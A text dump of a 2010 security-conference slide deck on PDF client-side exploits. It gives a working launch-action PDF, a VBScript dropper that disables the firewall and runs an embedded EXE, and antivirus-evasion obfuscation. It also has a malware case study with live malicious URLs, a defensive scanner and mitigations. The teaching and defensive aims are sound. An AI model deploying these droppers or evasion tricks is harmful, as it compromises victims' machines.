Client Side Exploits using PDF
C0C0N Security & Hacking Conference

By
Ankur Bhargava (Infosys Technologies Limited)
Tamaghna Basu (Security Researcher)
Contents
• About PDF
• Launch Action Exploits
• AcroJS Exploits
• Road Ahead
• Tools and References
About PDF
• What is PDF?
• Incidents in the wild
• Why PDF attacks?
• PDF document structure
Potentially Dangerous File / Penetration Document Format
Stands for Adobe Portable Document Format: a reliable, platform-independent format for the exchange and manipulation of electronic data. It has become the most widespread and used document description format throughout the world.

Adobe PDF – As a programming language
A PDF document is more than a powerful document format. It has a complete programming language of its own, dedicated to document creation and manipulation, with relatively strong execution features.
Adobe PDF – Security Issues
2010: Still Continuing… (timeline chart of incidents, March to June)
Incidents in the wild
• Jun 14: CVE-2010-1297 PDF, Adobe 0-day, WEO from sacchetti.dana@gmail.com
• Jun 20: CVE-2010-1297 PDF, Meeting agenda from alexis.mo88@gmail.com
• Jun 21: CVE-2010-1297 PDF, About the recent US-Japan Economic Relations
• Jun 21: CVE-2010-1297 PDF, Adobe 0-day, About the recent US-Japan Economic Relations - with Poison Ivy
• Jun 27: CVE-2009-0927 PDF, Discussion on cross-strait maritime cooperation
• Jul 6: CVE-2010-1297 PDF, EPA's Water Sampling Report from spoofed OCSPP@epa.go
• Jul 14: CVE-2009-4324 PDF, President Obama's Detrimental Deadlines
The Reign of Zeus:
• Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax and Kneber) is a Trojan horse that steals banking information by keystroke logging.
• Found in July 2007 when it was used to steal information from the United States Department of Transportation. It became more widespread in March 2009.
• In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of companies like Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon and BusinessWeek.
• ZeuS is sold in the criminal underground as a kit for around $3000-$4000, and is likely the one malware most utilized by criminals specializing in financial fraud. ZeuS has evolved over time and includes a full arsenal of information-stealing features.
The Reign of Zeus
A recent breakthrough in spreading Zeus via PDF files threatens to further the spread of Zeus. The PDF file (detected as Exploit.JS.Pdfka.bui) contained an exploit for the CVE-2010-0188 vulnerability, a buffer overflow that manifests itself when the field containing the image is accessed.
CVE-2010-0188 exploit statistics, 2010 (chart): popular on malwaredomainlist.com
Apple iPhone / iPad / iPod Code Execution and Sandbox Bypass
VUPEN ID: VUPEN/ADV-2010-1992
Release date: 2010-08-03
It is caused by a memory corruption error when processing Compact Font Format (CFF) data within a PDF document, which could be exploited by attackers to execute arbitrary code by tricking a user into visiting a specially crafted web page using Mobile Safari.
Why PDF
• Popularity and usability
• Flexibility, platform independence, rich text
• Trust level is high on PDF: it is seen as a static piece of information
• Rich API, easy to exploit / misuse
• Dominance of Adobe Reader, huge scope for attack
PDF document structure
The general structure of a PDF file is composed of the following components: header, body, cross-reference (xref) table, and trailer, as shown in figure 1.
Figure 1: PDF Document Structure – PDF header; body (objects); cross-reference table; trailer.
Launch Action
• Launch Action API
• Some examples
• Evading antivirus
• With embedded EXE
Launch Action Vulnerability
A launch action launches an application or opens or prints a document. The following are the action dictionary entries specific to this type of action.

ENTRIES
• S : name
(Required) The type of action that this dictionary describes; shall be Launch for a launch action.
• F : file specification
(Required if none of the entries Win, Mac, or Unix is present) The application that shall be launched or the document that shall be opened or printed. If this entry is absent and the conforming reader does not understand any of the alternative entries, it shall do nothing.
• Win : dictionary
(Optional) A dictionary containing Windows-specific launch parameters.

Launch Action Vulnerability
PARAMETERS (entries of the Win dictionary)
• F : byte string
(Required) The file name of the application that shall be launched or the document that shall be opened or printed, in standard Windows pathname format. If the name string includes a backslash character (\), the backslash shall itself be preceded by a backslash. This value shall be a simple string; it is not a file specification.
• P : byte string
(Optional) A parameter string that shall be passed to the application designated by the F entry. This entry shall be omitted if F designates a document.
Launch Action Vulnerability (demo screenshots)
• Open command prompt
• Open website
• Open notepad.exe
• Changing the message shown in the launch dialog: "Confidential Data!! If You are Authorized Click on 'Open'. Check 'Do Not Show This Message Again' to avoid this dialog next time"
• Launch Action in 9.3.3
Evading Antivirus by Changing the Format
You can take any other PDF data type and give it a number by wrapping it in "obj" and "endobj". Then later on, when you want to use that chunk of data, you can reference it, by number, with the "R" operator. These two examples are equivalent to Acrobat:

2 0 obj
(Hello World)
endobj
3 0 obj
<<
/Example 2 0 R
>>
endobj

3 0 obj
<<
/Example (Hello World)
>>
endobj
Evading Antivirus
What you can leave out:
• All page data
• All whitespace, except for the end-of-line after comments
• The version number part of %PDF-1.1
• The %%EOF
• The xref table, and thus also startxref
• Most object /Types
So what's actually required?
• %PDF-anything, but if the file is too confusing for Acrobat you need at least the first number, like %PDF-1.
• A trailer with a /Root dictionary for the Catalog
• A /Pages dictionary, but this can be empty, just as long as it's a dictionary type
• An /OpenAction if you want to launch your JavaScript upon file open
• The JavaScript action
Evading Antivirus
A minimal launch-action PDF built from only those required pieces (the header line followed by a single trailer line):

%PDF-1.
trailer<</Root<</Pages<<>>/OpenAction<</S/Launch/Win<</F(cmd.exe)/P<0A0A0A0A0A0A0A0A4E6F74653A2054686973206973206120736563757265205044462E20546F207669657720746865207365637572656420636F6E74656E7420706C6561736520636C69636B2074686520224F70656E2220627574746F6E2062656C6F772E>>>>>>>>>

The /P value is a PDF hex string. It decodes to eight line feeds followed by: Note: This is a secure PDF. To view the secured content please click the "Open" button below.
Evading Antivirus
POC: Launching an embedded EXE
Step 1: Embed the hex content of the EXE in a VBScript which extracts it out to the file system and runs it.
Step 2: Embed that VBScript in the PDF file as comments.
Step 3: Launch cmd.exe and create another script which extracts the main VBScript out of the PDF and runs them both.

Step 1: Embed the hex content of the EXE in a VBScript
' b holds the hex content of the EXE as a character array; bl is its length
Dim b,bl
Function c(d)
c=chr(d)
End Function
b=Array(c(77),c(90),c(144),c(0),c(3),c(0),c(0)....,"")
bl = 3072
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("helpme.exe", 2, True)
For i = 0 To bl
f.write(b(i))
Next
f.close()
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "netsh firewall set opmode disable", 0, True
WshShell.Run "helpme.exe", 0, False
WshShell.Run "taskkill /IM cmd.exe /F", 0, False

Step 2: Embed the VBScript in the PDF file as comments (one statement per ';' so it can be unpacked again later)
%'SS
%Dim b,bl;Function c(d);c=chr(d);End Function;b=Array(c(77),c(90),c(144),c(0),.....,"");bl = 3072;Set fso = CreateObject("Scripting.FileSystemObject");Set f = fso.OpenTextFile("helpme.exe", 2, True);For i = 0 To bl;f.write(b(i));Next;f.close();Set WshShell = WScript.CreateObject("WScript.Shell");WshShell.Run "netsh firewall set opmode disable", 0, True;WshShell.Run "helpme.exe", 0, False;WshShell.Run "taskkill /IM cmd.exe /F", 0, False
%'EE
6 0 obj
[/PDF /Text]
endobj

Step 3: Launch cmd.exe and create another script
The /P parameter handed to cmd.exe (a single line):
/c echo Set fso=CreateObject("Scripting.FileSystemObject") > execute.vbs && echo Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True) >> execute.vbs && echo pf=f.ReadAll >> execute.vbs && echo s=InStr(pf,"'SS") >> execute.vbs && echo e=InStr(pf,"'EE") >> execute.vbs && echo s=Mid(pf,s,e-s) >> execute.vbs && echo Set z=fso.OpenTextFile("toexecute.vbs", 2, True) >> execute.vbs && echo s = Replace(s,"%","") >> execute.vbs && echo s = Replace(s,";",vbcrlf) >> execute.vbs && echo z.Write(s) >> execute.vbs && execute.vbs && toexecute.vbs

Generated VBScript (execute.vbs): reads the PDF, cuts out the text between the 'SS and 'EE markers, strips the '%' comment prefix, turns ';' back into line breaks and writes the result to toexecute.vbs.
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("toexecute.vbs", 2, True)
s = Replace(s,"%","")
s = Replace(s,";",vbcrlf)
z.Write(s)
AcroJS
• AcroJS API
• Vulnerable APIs
• Obfuscation techniques
• Case study
AcroJS
• Acrobat JavaScript is the cross-platform scripting
language of the Adobe® Acrobat® family of products.
• Through JavaScript extensions, the viewer application
and its plug-ins expose much of their functionality to
document authors, form designers, and plug-in
developers.
• This functionality includes the following features:
– Processing forms within the document
– Batch processing collections of PDF documents
– Developing and maintaining online collaboration schemes
– Communicating with local databases
– Controlling multimedia events
JavaScript Actions
• A JavaScript action causes a script to be compiled and executed by the JavaScript interpreter.
• Depending on the nature of the script, various interactive form fields in the document may update their values or change their visual appearances.
PARAMETERS
• /S (type: name) – (Required) The type of action that this dictionary describes; must be JavaScript for a JavaScript action.
• /JS (type: text string or text stream) – (Required) A text string or text stream containing the JavaScript script to be executed.
AcroJS examples (screenshots): launchURL, alert box
Vulnerable APIs
• getIcon() [CVE-2009-0927]
– Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3, and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
• util.printf() [CVE-2008-2992] [CVE-2008-1104]
– Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104.
– Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file, related to the util.printf JavaScript function and floating point specifiers in format strings.
Vulnerable APIs
• getAnnots() [CVE-2009-1492]
– The getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments.
• customDictionaryOpen() [CVE-2009-1493]
– The customDictionaryOpen spell method in the JavaScript API in Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.
Vulnerable APIs
• Doc.media.newPlayer [CVE-2009-4324]
– Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.
• Collab.collectEmailInfo [CVE-2007-5659]
– Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.
Obfuscation Techniques
Why?
• To make analysis more difficult
• To avoid detection by virus scanners
Ways?
• Using JavaScript obfuscation
• Using PDF obfuscations (filters)
JavaScript Obfuscations: Unlearn Coding Ethics
Distorting format

Normal code:
function execute(data, time)
{
Timelag=5000;
if (time > Timelag)
{
// some code
}
}
function overflow(hex, loop)
{
for (i=0;i<loop;i++)
{
hex = hex + hex;
}
}

Obfuscated code (the same overflow() with all line breaks and indentation removed):
function overflow(hex, loop){for (i=0;i<loop;i++){hex = hex + hex;}}
Obfuscating Identifiers
Normal code: the execute() and overflow() functions from the previous slide.

Obfuscated code:
function aeiou(lIlIIlI, O0OOOO0OO000OO)
{
WWMWMWMWMWMW=5000;
if (O0OOOO0OO000OO > WWMWMWMWMWMW)
{
// some code
}
}
function aimpq(xxwmnnx, pqrtxw)
{
for (dqweaa=0; dqweaa < pqrtxw; dqweaa++)
{
xxwmnnx = xxwmnnx + xxwmnnx;
}
}
Obfuscating Identifiers – Even Worse
Identifiers that differ only in the number of underscore characters:
function _____(____,__________)
{
______________=5000;
if (__________>______________)
{
// some code
}
}
function ___(_______, ______)
{
for(________________=0; ________________<______; ________________ ++)
{
_______ = _______ + _______;
}
}

The same code with the format distortion applied on top:
function _____(____,__________){______________=5000;if (__________>______________){// some code}}function ___(_______, ______){for(________________=0; ________________<______; ________________ ++){_______ = _______ + _______;}}
Chain of Eval
Normal code:
app.alert("c0c0n");
Obfuscated code (each eval only yields the next string to evaluate; the alert runs at the innermost level):
func="eval";
one='app.alert("c0c0n")';
two='eval(one)';
three='eval(two)';
eval(func+"(three)");
Splitting JavaScript
Normal code:
app.alert("hello world");
Obfuscated code (the fragments concatenate to the normal statement before it is evaluated):
Rt=");";
Td='ert("hel';
Ab="ap";
Qw='ld"';
Kg="p.al";
Gh="lo wor";
eval("hh=Ab+Kg+Td+Gh+Qw+Rt");
eval(hh);
Callee Trick
The function accesses its own source and uses it as the key to decrypt code or data. Because the key is the exact source text, reformatting or renaming the function (as a beautifier does) changes the key and breaks the decryption.
function decrypt(cypher)
{
var key = arguments.callee.toString();
var plain = "";
for (var i = 0; i < cypher.length; i++)
{
plain += String.fromCharCode(key.charCodeAt(i % key.length) ^ cypher.charCodeAt(i));
}
...
}
PDF obfuscations
Using filters for streams. The most common encoding techniques:
• ASCIIHexDecode
• ASCII85Decode
• LZWDecode
• FlateDecode
• RunLengthDecode
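A pdfid-style triage scanner that undoes the evasions this deck shows before counting keywords: the hex-encoded /P string of the Launch action in the minimal PDF above, #xx-escaped names, and streams wrapped in the filters just listed. It is an added example, not pdfid.py and not code from the talk; the function names, the keyword list and the embedded sample PDF are constructed for it, and LZWDecode is left unimplemented on purpose so the unknown-filter path is exercised.

```python
"""pdfid-style triage for the evasions in this deck: hex-encoded /P strings in
Launch actions, #xx-escaped names and filter-encoded streams (added example)."""
import base64
import binascii
import re
import zlib

# A non-zero count is a signal to look closer, not a verdict.
SUSPICIOUS = (b"/OpenAction", b"/AA", b"/Launch", b"/JS", b"/JavaScript",
              b"/EmbeddedFile", b"/RichMedia")
# A stream with the dictionary of the object owning it; no xref is needed, which
# matters for the stripped-down files the deck describes.
STREAM = re.compile(
    rb"\d+\s+\d+\s+obj((?:(?!endobj).)*?)stream\r?\n(.*?)\r?\nendstream", re.S)
WIN_LAUNCH = re.compile(rb"/Win\s*<<(.*?)>>", re.S)

def normalize_names(data: bytes) -> bytes:
    """Undo the #xx escape allowed in PDF names: /J#61vaScript -> /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def decode_hex_strings(data: bytes) -> bytes:
    """Rewrite <hex> strings as (literal) strings so searches see the decoded
    bytes; the lookbehind leaves << dictionary delimiters alone."""
    def repl(m):
        digits = re.sub(rb"\s", b"", m.group(1))
        return b"(" + binascii.unhexlify(digits + b"0" * (len(digits) % 2)) + b")"
    return re.sub(rb"(?<!<)<((?:[0-9A-Fa-f]\s*)+)>", repl, data)

def asciihex_decode(raw: bytes) -> bytes:
    digits = re.sub(rb"[^0-9A-Fa-f]", b"", raw)   # drops whitespace and the > EOD
    return binascii.unhexlify(digits + b"0" * (len(digits) % 2))  # odd digit padded

def ascii85_decode(raw: bytes) -> bytes:
    raw = raw.strip()
    return base64.a85decode(raw[:-2] if raw.endswith(b"~>") else raw)  # ~> is EOD

def runlength_decode(raw: bytes) -> bytes:
    out, i = bytearray(), 0
    while i < len(raw):
        length, i = raw[i], i + 1
        if length == 128:                  # EOD
            break
        if length < 128:                   # next length+1 bytes are literal
            out += raw[i:i + length + 1]
            i += length + 1
        else:                              # next byte repeats 257-length times
            out += bytes([raw[i]]) * (257 - length)
            i += 1
    return bytes(out)

FILTERS = {b"/ASCIIHexDecode": asciihex_decode, b"/ASCII85Decode": ascii85_decode,
           b"/FlateDecode": zlib.decompress, b"/RunLengthDecode": runlength_decode}
# /LZWDecode is deliberately absent: decoding stops at the first unknown filter.

def decode_stream(dictionary: bytes, raw: bytes) -> bytes:
    """Apply the /Filter chain in the order the dictionary lists it."""
    for name in re.findall(rb"/[A-Za-z0-9]+Decode", dictionary):
        if name not in FILTERS:
            break
        try:
            raw = FILTERS[name](raw)
        except (zlib.error, ValueError, binascii.Error):
            break
    return raw

def scan_pdf(data: bytes) -> dict:
    """Count suspicious keywords over the raw file plus every decoded stream and
    list the (F, P) pairs of any Windows Launch action found."""
    views = [data] + [decode_stream(d, body) for d, body in STREAM.findall(data)]
    text = decode_hex_strings(normalize_names(b"\n".join(views)))
    report = {kw.decode(): len(re.findall(re.escape(kw) + rb"(?![A-Za-z0-9])", text))
              for kw in SUSPICIOUS}
    targets = []
    for win in WIN_LAUNCH.findall(text):
        app = re.search(rb"/F\s*\((.*?)\)", win)
        params = re.search(rb"/P\s*\((.*?)\)", win)
        targets.append((app.group(1).decode("latin-1") if app else "",
                        params.group(1).decode("latin-1") if params else ""))
    report["launch_targets"] = targets
    return report

def build_sample() -> bytes:
    """Constructed sample, not a real malicious file: a Launch action whose /P is
    a hex string, plus a JavaScript action inside a hex+Flate encoded object stream."""
    inner = b'3 0 <</S/J#61vaScript/JS(app.alert("constructed sample"))>>'
    body = binascii.hexlify(zlib.compress(inner)) + b">"
    message = b"Note: constructed sample, no command"
    return (b"%PDF-1.\n"
            b"1 0 obj<</Type/Catalog/Pages 2 0 R/OpenAction 3 0 R>>endobj\n"
            b"2 0 obj<</Type/Pages/Kids[]/Count 0>>endobj\n"
            b"4 0 obj<</Type/ObjStm/N 1/First 4/Length " + str(len(body)).encode()
            + b"/Filter[/ASCIIHexDecode/FlateDecode]>>stream\n" + body
            + b"\nendstream\nendobj\n5 0 obj<</S/Launch/Win<</F(cmd.exe)/P<"
            + binascii.hexlify(message) + b">>>>>endobj\ntrailer<</Root 1 0 R>>\n")

if __name__ == "__main__":
    for key, value in scan_pdf(build_sample()).items():
        print(key, value)
```

On the sample, a raw keyword count would miss both the JavaScript action (it sits inside an encoded object stream) and the launch message (it is a hex string); the scanner reports them only because it decodes first.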
Case Study
Malware found on www.malwaredomainlist.com
File link: www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
Added on: 29th July 2010
VirusTotal report: 5/42 (11.90%)

Analysis
STEP 1: Download the sample
wget www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
STEP 2: Behavioral analysis
Environment
• A VM image
• Filemon, Process Monitor, Regmon, TCPView
Results
• The process 'AcroRd32.exe' was trying to connect to the remote site http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
STEP 3: pdfid.py
STEP 4: Static/code analysis
• Word editor
• Decoded the script
• Formatted using jsbeautifier.org
• Replaced identifiers with meaningful names and removed unnecessary comments
• Replaced 'X' in the parameter
Shellcode analysis
Connecting to… http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
Road Ahead
• Mitigations
• Adobe's security measures
• Future exploit methods

How can we protect ourselves
• Enable automatic updates: it sounds simple, but you will need to turn it on in the software settings to make it happen by default.
• Disable PDF browser integration: most browsers will open PDFs without asking. An infected PDF will deliver its payload without warning, hiding in the background.
• Always install the latest patch/update, even for older Adobe product versions.
• Disable JavaScript.
• Uncheck 'Allow non-PDF file attachments with external applications' to prevent the launch action vulnerability.
• PDF alternatives such as Foxit are worthwhile as long as auto-updates are turned on; however, alternative programs become just as vulnerable to malware as they gain popularity.
Road Ahead
• Less focus on JavaScript exploits
• Attackers are focusing more on embedded objects inside PDF, i.e. Flash
• Adobe to introduce sandboxing to limit Reader exploits
Tools And References
Tools used
• Malzilla
• Mozilla add-on: JavaScript Deobfuscator by Wladimir Palant
• VMware Player
• Sysinternals tools: Process Monitor, Filemon, Regmon, TCPView
• WinHex
• HexEdit
References
• www.malwaredomainlist.com
• www.adobe.com/
• www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
• www.blog.didierstevens.com
• www.jsbeautifier.org
• http://research.globalthoughtz.com
• http://www.zdnet.com/
• http://www.scansafe.com/
• http://www.computerworld.com/s/article/9176117/
• http://www.darkreading.com/
• http://www.virustotal.com/
• http://recon.cx/
• http://www.blog.zynamics.com
• http://www.marketwire.com/
• http://www.symantec.com/
• http://www.securelist.com/en/analysis
• http://contagiodump.blogspot.com/
• http://www.f-secure.com/
• http://www.securelist.com/
• http://www.secureworks.com/
• http://en.wikipedia.org/
• http://www.malwaredomainlist.com/
• http://blogs.adobe.com/
• http://blog.fireeye.com/
• http://intrepidusgroup.com/
• http://www.vupen.com
Thank you
Tamaghna Basu
tamaghna.basu@gmail.com
twitter.com/titanlambda
tamahawk-techguru.blogspot.com
Ankur Bhargava
ankurbhargava87@gmail.com

Building Desktop RIAs with PHP, HTML & Javascript in AIR
 
iOS (Vulner)ability
iOS (Vulner)abilityiOS (Vulner)ability
iOS (Vulner)ability
 

More from n|u - The Open Security Community

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
n|u - The Open Security Community
 
Osint primer
Osint primerOsint primer
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
n|u - The Open Security Community
 
Nmap basics
Nmap basicsNmap basics
Metasploit primary
Metasploit primaryMetasploit primary
Api security-testing
Api security-testingApi security-testing
Api security-testing
n|u - The Open Security Community
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
n|u - The Open Security Community
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
n|u - The Open Security Community
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
n|u - The Open Security Community
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
n|u - The Open Security Community
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
n|u - The Open Security Community
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
n|u - The Open Security Community
 
Cloud security
Cloud security Cloud security
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
n|u - The Open Security Community
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
n|u - The Open Security Community
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
n|u - The Open Security Community
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
n|u - The Open Security Community
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
n|u - The Open Security Community
 
Linux for hackers
Linux for hackersLinux for hackers
Android Pentesting
Android PentestingAndroid Pentesting

More from n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Recently uploaded

"Scaling RAG Applications to serve millions of users", Kevin Goedecke
"Scaling RAG Applications to serve millions of users",  Kevin Goedecke"Scaling RAG Applications to serve millions of users",  Kevin Goedecke
"Scaling RAG Applications to serve millions of users", Kevin Goedecke
Fwdays
 
Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!
Tobias Schneck
 
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
AlexanderRichford
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Neo4j
 
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdfLee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
leebarnesutopia
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
FilipTomaszewski5
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
Jason Yip
 
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
Fwdays
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
c5vrf27qcz
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
LizaNolte
 
ScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking ReplicationScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking Replication
ScyllaDB
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
christinelarrosa
 
AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)
HarpalGohil4
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
Neo4j
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Fwdays
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
Fwdays
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
